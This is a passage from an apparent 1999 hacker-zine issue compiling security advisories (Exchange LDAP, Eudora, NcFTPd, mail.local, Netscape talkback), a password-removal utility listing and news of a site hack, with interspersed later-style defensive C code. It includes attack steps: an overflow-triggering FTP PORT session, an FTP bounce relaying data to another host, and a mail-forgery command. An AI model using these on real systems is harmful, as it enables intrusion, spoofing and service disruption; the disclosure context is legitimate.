- Change the shortcut arrow to whatever you want.
- Check your files for changes at startup, and prevent infection by unknown viruses.
- Log file editor, to View/Edit/Clear all your Windows log files from one program (improved from the PRO version).
- Personalize your Desktop pictures.
- Change the Windows 9x folder structure.
- Watch what the uninstall programs call when they launch, create your own and remove any you don't want.
- Watch what Windows launches behind your back (Edit/Remove/Insert).
- Change the layout of your Desktop, and some of its features.
- Clear your history files when leaving Windows.
- Log logins at startup.
- Change your registration information.
- Forgot your password to Windows9x? Retrieve or remove the password files directly.
- Got a habit of forgetting stuff? The Wintrasher Calendar & Popup is with you every time you start Windows.
- Has your system ever crashed, or ever wished that you didn't install that program? The system backup feature backs up critical system files, including the Registry.
- Lock your system as with Windows NT with one click.
- Make sure you are the only one that can use Wintrasher at the station, by password-protecting WT-Gold.

For Windows 95/98. 1.6 MB. By The Silents Denmark.

Packetstorm download: http://www.genocide2600.com/~tattooman/utility-nt/wtgold.zip
Main site: http://www.silents.dk/

05.0 LDAP buffer overflow
~~~~~~~~~~~~~~~~~~~~~

From: X-Force
To: BUGTRAQ@netspace.org
Subject: ISS Security Advisory: LDAP Buffer overflow against Microsoft Directory Services
Date: 16 March 1999 22:03

-----BEGIN PGP SIGNED MESSAGE-----

ISS Security Advisory
March 15, 1999

LDAP Buffer overflow against Microsoft Directory Services

Synopsis:

ISS X-Force has discovered a buffer overflow exploit against Microsoft Exchange's LDAP (Lightweight Directory Access Protocol) server which allows read access to the Exchange server directory by using an LDAP client. This buffer overflow consists of a malformed bind request that overflows the buffer and can execute arbitrary code. This attack can also cause the Exchange LDAP service to crash. This vulnerability exists in Microsoft Exchange Server version 5.5.

Description:

This exploit occurs during the LDAP binding process. Binding involves logging in or authenticating to a directory, and consists of sending a username, a password, and a binding method. There are two methods in which to use this vulnerability against an Exchange server. The first consists of sending a particular type of invalid LDAP bind packet which will cause an overflow to occur; this will cause the LDAP service to crash. The second uses a large malformed LDAP bind packet that is carefully crafted to take advantage of the buffer overflow and can be used to execute arbitrary code.

Recommendations:

Microsoft has made a patch available for the LDAP attack.
Patch information is available at:
http://www.microsoft.com/security/bulletins/ms99-009.asp

Network administrators can protect internal systems from external attack by adding a rule to a filtering router or firewall of the type:

Deny all incoming TCP packets with a destination port of 389.

Many firewalls or packet filters may already have more restrictive rulesets that already encompass this filtering rule, in which case the network is already protected from an external attack. This ruleset would include filtering all incoming traffic to TCP port 389.

Additional Information:

These vulnerabilities were primarily researched by the ISS X-Force.

________

Copyright (c) 1999 by Internet Security Systems, Inc.

Permission is hereby granted for the electronic redistribution of this Security Advisory. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Security Advisory in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission.

Internet Security Systems, Inc. (ISS) is the leading provider of adaptive network security monitoring, detection, and response software that protects the security and integrity of enterprise information systems. By dynamically detecting and responding to security vulnerabilities and threats inherent in open systems, ISS's SAFEsuite family of products provide protection across the enterprise, including the Internet, extranets, and internal networks, from attacks, misuse, and security policy violations. ISS has delivered its adaptive network security solutions to organizations worldwide, including firms in the Global 2000, nine of the ten largest U.S. commercial banks, and over 35 governmental agencies. For more information, call ISS at 678-443-6000 or 800-776-2362 or visit the ISS Web site at http://www.iss.net.

Disclaimer

The information within this paper may change without notice.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

X-Force PGP Key available at: http://www.iss.net/xforce/sensitive.html as well as on MIT's PGP key server and PGP.com's key server.

X-Force Vulnerability and Threat Database: http://www.iss.net/xforce

Please send suggestions, updates, and comments to: X-Force of Internet Security Systems, Inc.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBNu3GuzRfJiV99eG9AQF48wP+J1/vW040sA5f9Nz56JEF9s6d/tpainG1
Qw7Jxbry374IFinJZfk/K5FJkdbjJfMcyGfgWJjNriYZJ0EKFkQcRK7XNAUe8AGu
LWaBW4l0v1Qox3ueR3GdCskQ8haK9vpxkFkbPmlefIWKMsVhncQPloJwU3/WyPNV
uLJBWqHEpkU=
=Zp+/
-----END PGP SIGNATURE-----

From Help Net Security
http://net-security.org/

PATCH FOR "MALFORMED BIND REQUEST"
by BHZ, Wednesday 17th Mar 1999 on 8:40 pm CET

Microsoft has released a patch that eliminates a vulnerability in the LDAP Bind function for Microsoft (r) Exchange (r) 5.5. The vulnerability could allow denial of service attacks against an Exchange server or, under certain conditions, could allow arbitrary code to be run on the server. A fully supported patch is available, and Microsoft recommends that customers who are at risk from this attack download and install it.
You can obtain patch for X86-based Exchange or Alpha-based Exchange

@HWA

06.0 HP Security bulletin: HPTerm exploitability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Thu, 18 Mar 1999 12:36:13 -0800
From: aleph1@UNDERGROUND.ORG
Reply-To: support_feedback@us-support.external.hp.com
To: BUGTRAQ@netspace.org
Subject: Security Bulletins Digest

HP Support Information Digests
===============================================================================
o HP Electronic Support Center World Wide Web Service
  ---------------------------------------------------

  If you subscribed through the HP Electronic Support Center and would like to be REMOVED from this mailing list, access the HP Electronic Support Center on the World Wide Web at:

  http://us-support.external.hp.com

  Login using your HP Electronic Support Center User ID and Password. Then select Support Information Digests. You may then unsubscribe from the appropriate digest.
===============================================================================

Digest Name: Daily Security Bulletins Digest
Created: Thu Mar 18 3:00:02 PST 1999

Table of Contents:

Document ID      Title
---------------  -----------
HPSBUX9903-093   Security Vulnerability with hpterm on HP-UX 10.20

The documents are listed below.
-------------------------------------------------------------------------------

Document ID: HPSBUX9903-093
Date Loaded: 19990317
Title: Security Vulnerability with hpterm on HP-UX 10.20

-------------------------------------------------------------------------
HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00093, 18 March 1999
-------------------------------------------------------------------------

The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible.
-------------------------------------------------------------------------
PROBLEM:      PHSS_13560 introduced a library access problem into hpterm.
PLATFORM:     HP9000 Series 700 and Series 800, HP-UX release 10.20 only.
DAMAGE:       Users can gain increased privileges.
SOLUTION:     Install PHSS_17830.
AVAILABILITY: The patch is available now.
-------------------------------------------------------------------------

I.
  A. Background

     PHSS_13560 introduced a library access problem into hpterm, the terminal emulator for the X Window system. (See hpterm(1)).

  B. Fixing the problem

     Installing patch PHSS_17830 completely fixes this problem.

     NOTE: Three older hpterm patches have been released including PHSS_13560, PHSS_15431, and PHSS_17332. All of these older patches are being superseded with the release of the PHSS_17830. Do not use PHSS_13560, PHSS_15431, or PHSS_17332.

  C. To subscribe to automatically receive future NEW HP Security Bulletins from the HP Electronic Support Center via electronic mail, do the following:

     Use your browser to get to the HP Electronic Support Center page at:

     http://us-support.external.hp.com (for US, Canada, Asia-Pacific, & Latin-America)
     http://europe-support.external.hp.com (for Europe)

     Login with your user ID and password (or register for one). Remember to save the User ID assigned to you, and your password.

     Once you are in the Main Menu:

     To -subscribe- to future HP Security Bulletins, click on "Support Information Digests".

     To -review- bulletins already released from the main Menu, click on the "Technical Knowledge Database (Security Bulletins only)". Near the bottom of the next page, click on "Browse the HP Security Bulletin Archive". Once in the archive there is another link to our current Security Patch Matrix. Updated daily, this matrix categorizes security patches by platform/OS release, and by bulletin topic.

     The security patch matrix is also available via anonymous ftp:

     us-ffs.external.hp.com
     ~ftp/export/patches/hp-ux_patch_matrix

  D.
     To report new security vulnerabilities, send email to security-alert@hp.com

     Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message with a -subject- (not body) of 'get key' (no quotes) to security-alert@hp.com.

Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party.
_______________________________________________________________________
-----End of Document ID: HPSBUX9903-093--------------------------------------

@HWA

07.0 Eudora buffer overflow exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Approved-By: aleph1@UNDERGROUND.ORG
Received: from enext.dyndns.org (port25.mico10.tir.com [216.40.137.210]) by netspace.org (8.8.7/8.8.7) with ESMTP id CAA18560 for ; Sat, 20 Mar 1999 02:17:38 -0500
Received: from localhost (whiz@localhost) by enext.dyndns.org (8.8.7/8.8.7) with ESMTP id CAA12075 for ; Sat, 20 Mar 1999 02:21:35 -0500
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:
Date: Sat, 20 Mar 1999 02:21:35 -0500
Reply-To: whiz
Sender: Bugtraq List
From: whiz
Subject: Eudora Attachment Buffer Overflow
To: BUGTRAQ@netspace.org

I have found another problem with Eudora, attachments, and long filenames that is similar to the problem I found last year. If two messages are sent to an Eudora 4.1 user that have an attachment with a filename of around 231 or more, the next time the user checks his mail Eudora crashes. I say 231 because C:\Program Files\Eudora\Attach\ is 31 characters + 231 = 262 = longer than Windows can handle.
Eudora truncates the long filename correctly and that's why you can't send just one message with a long name, like you used to be able to do with Eudora 4.0. But it truncates it so the path length is 259 characters which is the maximum. Then when it receives the second attachment it truncates, and tries to add a 1 to the end, this is where it crashes. This allows you to modify the return address to point to arbitrary code.

Here is how I tested:

Send message to myself with attachment that has a long filename
Resend exact message
Check my mail
Eudora crashes

Both the Win 95 and Win NT versions, along with the 4.2 beta of Eudora are affected. The vendor of Eudora, Qualcomm was notified of this problem on 3/12/99.

-whiz
whiz@enext.dyndns.org
http://enext.dyndns.org/~whiz/

@HWA

08.0 Netscape SUSE crash exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Return-Path:
Approved-By: aleph1@UNDERGROUND.ORG
Date: Fri, 19 Mar 1999 22:45:02 -0800
Reply-To: Aleph One
Sender: Bugtraq List
From: Aleph One
Subject: Security hole in Netscape Communicator's 4.5 "talkback" function
To: BUGTRAQ@netspace.org

______________________________________________________________________________
SuSE Security Announcement

Package:  netscape-4.5-9
Date:     Thu Mar 18 10:22:11 CET 1999
Affected: unix operating systems using netscape communicator 4.5
______________________________________________________________________________

A security hole was discovered in the package mentioned above. Please update as soon as possible or disable the service if you are using this software on your SuSE Linux installation(s).

Other Linux distributions or operating systems might be affected as well, please contact your vendor for information about this issue.

Please note that we provide this information on an "as-is" basis only. There is no warranty whatsoever and no liability for any direct, indirect or incidental damage arising from this information or the installation of the update package.
______________________________________________________________________________

1. Problem Description

The Netscape Communicator 4.5 comes with "talkback", a quality enhancement tool by Fullcircle (www.fullcircle.com). If the communicator crashes for any reason, the file with the name /tmp/.$UID.talkback is read in, and the pid in this file is killed. After that, the file is truncated/created without checks for {sym|hard}links and the pid of the current talkback process is written into the file.

2. Impact

Anyone on the system can kill a process of users if their communicator crashes. Anyone on the system can overwrite/create any file an attacked user has write access to. We didn't check if there's a buffer overflow possible when the talkback application reads in the file.

3. Solution

Disable talkback. You may do this by executing the following commands (your path to netscape may differ):

/bin/mv /opt/netscape/talkback /opt/netscape/talkback.disable
/bin/chmod -R 600 /opt/netscape/talkback

Netscape responded to this vulnerability that the current version does not install the talkback application. You may install the new version 4.51 from Netscape which also fixes some other security vulnerabilities. However, if you update from a 4.5 installation, ensure that you execute the lines above.

______________________________________________________________________________

SuSE has got two free security mailing list services to which any interested party may subscribe:

suse-security@suse.com
  - unmoderated and for general/linux/SuSE security discussions. All SuSE security announcements are sent to this list.

suse-security-announce@suse.com
  - SuSE's announce-only mailing list. Only SuSE's security announcements are sent to this list.

To subscribe, send an email to majordomo@suse.com with the text

  subscribe suse-security
or
  subscribe suse-security-announce

in the body of the message.
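The bug class in the talkback advisory (a predictable per-user file in /tmp that gets truncated without checking what the name now points at) is the classic symlink-following race, and the defensive pattern is the mirror image of what the advisory describes: open without truncating, refuse to follow links, verify the descriptor you actually got, and only then truncate. The C below is an added example written for this issue, not SuSE's or Netscape's code. The file name, the helper names and the scratch directory are assumptions made for the example; the two demo functions build their own files so the block runs stand-alone and cleans up after itself.

```c
#define _POSIX_C_SOURCE 200809L
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open (creating if absent) a per-user state file that lives in a shared
 * directory, then truncate it.  Differences from the pattern the advisory
 * describes:
 *   - O_NOFOLLOW refuses a symlink at the final path component (ELOOP);
 *   - no O_TRUNC on the open, so nothing is destroyed before the checks;
 *   - fstat() on the descriptor (not stat() on the path, which would race)
 *     confirms a regular file, a single hard link and our own uid.
 * Returns a writable descriptor, or -1 if anything looks wrong. */
int open_state_file_safely(const char *path, uid_t owner)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW | O_NOCTTY, 0600);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != owner) {
        close(fd);
        return -1;
    }
    if (ftruncate(fd, 0) != 0) {        /* only now is truncation safe */
        close(fd);
        return -1;
    }
    return fd;
}

/* Scratch directory for the self-checks (constructed here, removed after). */
static int make_scratch_dir(char *buf, size_t n)
{
    snprintf(buf, n, "/tmp/tbdemoXXXXXX");
    if (mkdtemp(buf))
        return 0;
    snprintf(buf, n, "./tbdemoXXXXXX");
    return mkdtemp(buf) ? 0 : -1;
}

/* Plant a symlink where the state file should be and confirm the open is
 * refused and the link target keeps its contents.  Returns 1 on the
 * expected behaviour, 0 otherwise. */
int demo_symlink_is_rejected(void)
{
    char dir[64], victim[128], state[128];
    struct stat st;
    int ok = 0, fd;
    FILE *f;

    if (make_scratch_dir(dir, sizeof dir) != 0)
        return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(state, sizeof state, "%s/.state", dir);
    f = fopen(victim, "w");
    if (f == NULL)
        return 0;
    fputs("important data\n", f);       /* 15 bytes of "victim" content */
    fclose(f);
    if (symlink(victim, state) == 0) {
        fd = open_state_file_safely(state, getuid());
        if (fd == -1 && stat(victim, &st) == 0 && st.st_size == 15)
            ok = 1;                      /* refused, target untouched */
        if (fd >= 0)
            close(fd);
    }
    unlink(state); unlink(victim); rmdir(dir);
    return ok;
}

/* The honest case: no link in the way, so the file is created with mode
 * 0600, truncated and written.  Returns 1 on the expected behaviour. */
int demo_plain_file_is_accepted(void)
{
    char dir[64], state[128];
    struct stat st;
    int ok = 0, fd;

    if (make_scratch_dir(dir, sizeof dir) != 0)
        return 0;
    snprintf(state, sizeof state, "%s/.state", dir);
    fd = open_state_file_safely(state, getuid());
    if (fd >= 0) {
        if (write(fd, "12345\n", 6) == 6 && fstat(fd, &st) == 0 &&
            st.st_size == 6 && (st.st_mode & 0777) == 0600)
            ok = 1;
        close(fd);
    }
    unlink(state); rmdir(dir);
    return ok;
}
```

The order of operations is the whole point: the advisory's sequence (truncate, then write) lets an attacker choose what gets truncated, whereas open-without-truncate followed by fstat() on the descriptor means every check applies to the same inode that is later truncated, so there is no window between the check and the use.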
Or just issue an

  echo subscribe suse-security | mail majordomo@suse.com
or
  echo subscribe suse-security-announce | mail majordomo@suse.com

______________________________________________________________________________

If you want to report *NEW* security bugs in the SuSE Linux Distribution please send an email to security@suse.de or call our support line. You may use pgp with the public key below to ensure confidentiality.
______________________________________________________________________________

This information is provided freely to everyone interested and may be redistributed provided that it is not altered in any way.

Type Bits/KeyID    Date       User ID
pub  2048/3D25D3D9 1999/03/06 SuSE Security Team

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

-----END PGP PUBLIC KEY BLOCK-----

@HWA

09.0 Hotmail to plug potential security problem
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HOTMAIL BUG
by BHZ, Sunday 21st Mar 1999 on 3:01 am CET

The security hole, that Hotmail plans to plug, could make users who access Hotmail through a public terminal or other shared computer vulnerable to the prying eyes of subsequent users. Hotmail said it had caught the security problem during a routine security audit and was close to implementing its fix, which is to stop authentication by IP address and require the use of cookies. The service noted that users currently can protect themselves against the exploit by opting for cookie-based authentication.

Contributed by Thejian.

@HWA

10.0 NcFTPd Exploit (old but missed in earlier issues)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This advisory is from Proof Of Concept

Proof of Concept - Security Advisory 02/23/99
http://poc.csoft.net
Released by poc@csoft.net
sw3wn@poc.csoft.net
---
Affected Program  NcFTPd
Description       FTP server (commercial)
Severity          Theoretical root compromise, logs compromise

Synopsis:

NcFTPd is a commercial FTP (File Transfer Protocol) server, in the NcFTP product line. The source code is not publicly released.
This was tested on Linux with libc5 (there's a glibc2 specific version available).

Problem:

NcFTPd's PORT parsing function has a stack buffer overflow problem, which would basically allow a user to remotely execute arbitrary code - the thing here is that the PORT parsing function seems to change characters that are not in the range 0x30-0x39 (ASCII '0'-'9') into 0x20 (ASCII space), hence making an exploit almost impossible (note that, if ASCII 0x40 would be allowed that would be a different story =p). The program only parses for characters out of the 0-9 range in a specific area in memory (the one that contains the return address heh) - the rest is kept unchanged, and you can't really go further in memory, input line size is restricted.

Like with most buffer overflows there are probably work-arounds to exploit it - this could have been a particularly neat exploit, since it runs as a child and one could gain access transparently without crashing the parent.

The current bug is not really a problem, it can crash the child process with a segfault, the parent process receives a signal 6 (abort) and the child process stays zombie for a few seconds and a brand new one is created. A few minor DoS attacks are possible but, who cares. Oh and this could be used to not get listed in the logs too.

Example:
--
evil:$ nc victim ftp
220 victim NcFTPd Server (unregistered copy) ready.
user anonymous
331 Guest login ok, send your complete e-mail address as password.
pass some@thing
230-You are user #1 of 50 simultaneous users allowed.
230-
230 Logged in anonymously.
port 00000000000000000000000000000000000000000000 (...)
501 Syntax error in parameters.
evil:$
--

Status:

I contacted the authors, nice enough to send me back the piece of code that causes the problem - here goes:

/* Vendor excerpt as sent to the advisory author, shown with the headers
 * it needs to compile.  gLoggedIn, gAllowPORT, gRemoteDataAddr,
 * NotLoggedIn() and Reply() are NcFTPd globals and helpers that are not
 * part of the excerpt. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>

static int
ftp_aton(const char *cp, struct sockaddr_in *sinaddr)
{
    char buf[64];
    char *dst;
    char *dstlim;
    int i, c;
    unsigned int octets[6], u;

    memset(sinaddr, 0, sizeof(struct sockaddr_in));
    dst = buf;
    dstlim = dst + sizeof(buf);
    for ( ; ; ) {
        c = *cp++;
        if (c == '\0')
            break;
        if (! isdigit(c))
            c = ' ';            /* every non-digit becomes a space */
        if (dst < dstlim)
            *dst++ = c;         /* copying stops at buf[63] ... */
    }
    *dst = '\0';                /* ... but with 64+ input chars dst == dstlim
                                 * here, so the NUL lands at buf[64] */
    if (sscanf(buf, "%u%u%u%u%u%u",
        &octets[0], &octets[1], &octets[2],
        &octets[3], &octets[4], &octets[5]
    ) != 6) {
        return (-1);
    }
    for (i=0; i<6; i++) {
        if (octets[i] > 0xFF)
            return (-1);
    }
    sinaddr->sin_family = AF_INET;
    u = (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | (octets[3]);
    sinaddr->sin_addr.s_addr = htonl(u);
    u = (octets[4] << 8) | (octets[5]);
    sinaddr->sin_port = htons((unsigned short) u);
    return (0);
}   /* ftp_aton */

void
Port(char *line)
{
    if (gLoggedIn == 0) {
        NotLoggedIn();
        return;
    }
    if (gAllowPORT == 0) {
        Reply("550 This site does not permit PORT. Please use PASV instead.\r\n");
        return;
    }
    if (ftp_aton(line, &gRemoteDataAddr) < 0) {
        Reply("501 Syntax error in parameters.\r\n");
        return;
    }
    /* ... */
}

@HWA

10.1 NcFTPd proxy exploitation
~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept - Security Advisory 02/16/99
http://poc.csoft.net
Released by poc@csoft.net
sw3wn@poc.csoft.net
---
Affected Program  NcFTPd
Description       FTP server (commercial)
Severity          Default PORT setup, log compromise

Synopsis:

NcFTPd is a commercial FTP (File Transfer Protocol) server, in the NcFTP product line. The source code is not publicly released. This was tested on Linux with libc5 (there's a glibc2 specific version available).

Overview:

To initiate a FTP transfer, there must be two connections, one control connection (server's ftp port), and one data connection. When a client wants to tell the server where to send the data (ie.
a file you want to download, or a directory listing), it must use the command PORT - in which the destination address and port is specified.

Problem:

NcFTPd does not check that the destination PORT address is the user's IP. This means anybody can transmit data from the server anywhere, anonymously. Obviously this can lead to potential `easy' DoS attacks and spoofing (say, someone uploads a file containing commands of something to incoming, PORT to some host/port, and use RETR (retrieve file)).

Such connections are possible with the default NcFTPd configuration, but can be disallowed:

general.cf> allow-outgoing-proxy-data-connection-ports-below-1024 - no
general.cf> allow-proxy-connections - no

Most other FTP server daemons I've tried have this feature disabled - even if the proxy connections are a documented part of RFC 959 (FTP protocol). But this is no big deal, just a possible amelioration.

I made an example program that listens on a port and dumps arbitrary received data in string, hex or ascii/hex format, and sends back EOF (needed for FTP data transfer).
[http://poc.csoft.net/code/listerine/listerine.tar.gz]

Example:

evil:$ telnet victim ftp            # victim runs NcFTPd
user anonymous                      # anonymous is up by default
pass some@thing
port 192,168,0,1,5,131              # connect on port 1411
retr incoming/stuff                 # send arbitrary data, as it
                                    # was coming from host victim.

To see for yourself, you can run my example program `listerine', on the host victim. I tested this on my LAN and on remote machines too.

Status:

Got response from authors, the problem can be fixed indeed with the general.cf options mentioned above, but they are not enabled with default configuration.
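Both NcFTPd advisories come down to the same handler: in the vendor's ftp_aton() above the terminating NUL lands one byte past buf once the PORT argument reaches 64 characters, and, separately, the parsed address is used without asking whether it belongs to the client on the control connection. The C below is an added example written for this issue, not NcFTPd's code: a bounds-checked parser for the RFC 959 h1,h2,h3,h4,p1,p2 form that never copies into a fixed buffer, plus the peer-address and privileged-port check that the two general.cf options above switch on. The function names and the 64-character limit are assumptions made for the example; the sample inputs are the ones from the two transcripts.

```c
#include <ctype.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>

#define PORT_ARG_MAX 64   /* assumed limit, same size as the original buf */

/* Strict replacement for ftp_aton(): parses "h1,h2,h3,h4,p1,p2" in place,
 * with no intermediate copy, so there is no fixed buffer to overrun.
 * Over-long input, missing fields, separators other than commas, octets
 * above 255 and trailing junk all return -1; on success sinaddr is filled
 * in and 0 is returned. */
int safe_ftp_aton(const char *cp, struct sockaddr_in *sinaddr)
{
    unsigned int octets[6];
    const char *p = cp;
    int i;

    memset(sinaddr, 0, sizeof(*sinaddr));
    if (strlen(cp) >= PORT_ARG_MAX)
        return -1;                          /* reject, do not truncate */

    for (i = 0; i < 6; i++) {
        unsigned int v = 0;
        int digits = 0;
        while (isdigit((unsigned char)*p)) {
            v = v * 10 + (unsigned int)(*p - '0');
            if (v > 0xFF)
                return -1;                  /* octet out of range */
            p++;
            digits++;
        }
        if (digits == 0)
            return -1;                      /* empty field */
        octets[i] = v;
        if (i < 5) {
            if (*p != ',')
                return -1;                  /* RFC 959 separator only */
            p++;
        }
    }
    while (*p == ' ' || *p == '\r' || *p == '\n')
        p++;                                /* tolerate the line ending */
    if (*p != '\0')
        return -1;                          /* trailing junk */

    sinaddr->sin_family = AF_INET;
    sinaddr->sin_addr.s_addr = htonl((octets[0] << 24) | (octets[1] << 16) |
                                     (octets[2] << 8) | octets[3]);
    sinaddr->sin_port = htons((unsigned short)((octets[4] << 8) | octets[5]));
    return 0;
}

/* The check the proxy advisory asks for: a data connection may only go back
 * to the host on the control connection, and never to a privileged port.
 * Returns 1 if the target is acceptable, 0 if it would be a bounce. */
int port_target_allowed(const struct sockaddr_in *peer,
                        const struct sockaddr_in *target)
{
    if (target->sin_family != AF_INET)
        return 0;
    if (target->sin_addr.s_addr != peer->sin_addr.s_addr)
        return 0;                           /* third-party host: bounce */
    if (ntohs(target->sin_port) < 1024)
        return 0;                           /* privileged port on the client */
    return 1;
}

/* Parse and police in one step, as a Port() handler would.  -1 means the
 * caller should answer "501 Syntax error in parameters." as in the
 * transcript; -2 means the address parsed but must be refused. */
int accept_port_command(const char *arg, const struct sockaddr_in *peer,
                        struct sockaddr_in *out)
{
    if (safe_ftp_aton(arg, out) < 0)
        return -1;
    if (!port_target_allowed(peer, out))
        return -2;
    return 0;
}
```

Rejecting over-long input up front is what makes the length limit safe: the original code also has a limit, but enforces it by silently truncating into a buffer and then writing one more byte, which is the off-by-one the advisory's 44 zeros trip over once extended.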
.sw3

@HWA

10.2 Mail.local sendmail exploit advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept - Security Mini-advisory 02/15/99
http://poc.csoft.net
Released by poc@csoft.net
sw3wn@poc.csoft.net
---
Affected Program  mail.local (Berkeley Sendmail)
Description       Local mailer (forward mail to mailboxes)
Severity          Mailbox compromise

Synopsis:

mail.local is a small program distributed with Berkeley Sendmail, used as a local mailer (forwards mail to mailboxes), also able to handle LMTP commands. It runs SUID root in order to access the user's mailbox (ie. /var/spool/mail, /usr/spool/mail).

Overview:

When mail has to be written to a user's mailbox locally, a local mailer is used; the mail.local program that comes with Sendmail does this task, but does not restrict the length of a message, and does not check the authenticity of the user who sends it. This is obviously not a big security issue - but still, it has to get fixed, as this could lead to more serious problems if used on a system with lots of e-mail accounts.

Problem:

This can lead to the compromising of anybody's mailbox - from fake (and totally untraceable) messages, to flooding the mailbox (and maybe the hard drive). I found this by inspecting the source code for buffer overflows heh.

Say I wanted to send a fake message like it was coming from root to user joe, simply running

  mail.local -f root joe

could do it. mail.local simply dumps the message as you enter it in the user's mailbox.

Since mail.local does not check for message length, you can flood a mailbox (and possibly the hard drive) in a matter of seconds.

Finally, mail.local only checks if a user exists by using /etc/passwd, that means anybody could create mailboxes for users like bin, nobody, etc (usually it's no security compromise).
Examples:
[http://poc.csoft.net/advs/mail.local/mailfrm.tar.gz]
[http://poc.csoft.net/advs/mail.local/junk.tar.gz]

Patch/Fix:
[http://poc.csoft.net/advs/mail.local/mail.local.diff]

Status:

As of 02/22/99, I received an e-mail from the authors, the program should be shipped non-setuid in 8.10.

.sw3

@HWA

11.0 Its in the bag, the great hacker backpack caper...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I really debated giving this any space at all but it is pertinent to the mainstream ideals that are being generated by the media so it's here.... *sigh* - Ed

March 24th 1999 via wired news

Hackers Sack Competition Site
by Leander Kahney
5:00 p.m. 23.Mar.99.PST

Having baited crackers with a "hacking" competition to win a backpack, a retailer's site has been hacked for real.

As previously reported, a Belgian bag manufacturer is giving a "Hacker" branded backpack to everyone that cracks a password competition on its Web site. But on Tuesday Kipling's site was hacked for real.

The opening page was replaced with a screen grab that showed a big red cross and the message: "Sorry, we've been hacked.... Site under reconstruction."

The altered page stayed up for most of Tuesday, and Kipling was unavailable for comment.

The site intrusion may have been retaliation for disparaging remarks made about crackers by a Kipling vice president.

Shortly before the site was hacked, the password competition was finally cracked. It took a week of trying, claimed Mooby, a hacker who organized a brute force method of using software to generate all possible combinations.

The crackers' efforts finally paid off over the weekend, Mooby said in an email. Ironically, the password wasn't cracked by software, but obtained by a more traditional method -- weaseling it out of someone.

"It's a pity that I can't tell how I got the final password/login," he wrote. "We never would have guessed [it]. Let's just say I used some of my nerd-heroic social skills to get the right things."
Having obtained the password, Mooby shared it. "I hope Kipling sends me this
backpack," he wrote, "and all the other 99 people I told the password."

-=-

-=-

Date: Sat, 20 Mar 1999 05:20:50 -0700 (MST)
From: mea culpa
To: InfoSec News
Subject: [ISN] Retailer Frustrates Hackers

http://www.wired.com/news/news/culture/story/18616.html

Retailer Frustrates Hackers
by Leander Kahney
3:00 a.m. 20.Mar.99.PST

Promoting a new line of backpacks aimed at "hackers," a European bag
manufacturer is running a crack-the-password competition on its Web site. But
to the fury of hackers trying to bypass the competition and crack the site in
earnest, all attempts to date have been unsuccessful.

According to an amusing line of posts to Slashdot, an information
clearinghouse for computer nerds, the hackers reveal their mounting
frustration at being unable to thwart the password competition.

"Come on!" wrote one. "Out of the 10,000 people who have read this article, no
one has found the username and password? I find that very hard to believe. It
has to be something completely insanely easy, right?"

Apparently not.

The "crack and win" password competition is organized by Kipling, a
manufacturer of travel bags, backpacks, and accessories based in Antwerp,
Belgium. The competition promotes its Hacker line of bags and backpacks, which
have names like bookmark, mailbomb, browser, spam, firewall, and download.

"The game challenges every pirate out there to break into our security and
win a Hacker bag," the company said in a press release.

"You can find the code in two ways," the release continued. "Real computer
freaks will find the information in the traditional hacker manner. Those with
less hacking experience can follow the hints which appear on the screen, which
refer surfers to a Kipling sales point. Those who remain alert will surely
find the letter/number code."

Kipling confirmed it would give a bag to everyone who cracks the code, which
takes the form of a username login and password.
Rising to the challenge, readers of Slashdot quickly encouraged each other to
break the code, just for the hell of it. But after a week of trying, most
efforts have been abandoned.

"I'm sorry to say that so far no one has been able to beat the login," said
Slashdot contributor Greg Boyce, who offered to buy a Slashdot hat for the
first person to crack it. "Turns out it was a bit more complicated than I
thought it would be."

The most ambitious attempt adopted a "brute force" strategy generating all
possible combinations of username and password. Special software to automate
the process is available on the Web.

Other attempts ranged from examining the source code for the Web page, which
is coded in Javascript, to breaking into the site. However, Kipling said
attempts to breach the site's security have so far failed.

"No one has cracked it," said Edith Iris, Kipling's marketing manager. "We've
had no problems."

To add to the hackers' irritation, Kipling also garbled the definitions of
cherished computer terms in its marketing blurb.

According to Kipling's site, "A hacker is a cunning computer expert who cracks
the security systems of computers in order to steal or destroy information."

But in the programming community, a malicious computer expert is called a
"cracker." A hacker is simply a harmless programmer.

"Hacker is the term in common parlance," countered Larry Lein, executive vice
president of Kipling USA. "If you asked me what a cracker was, I'd say someone
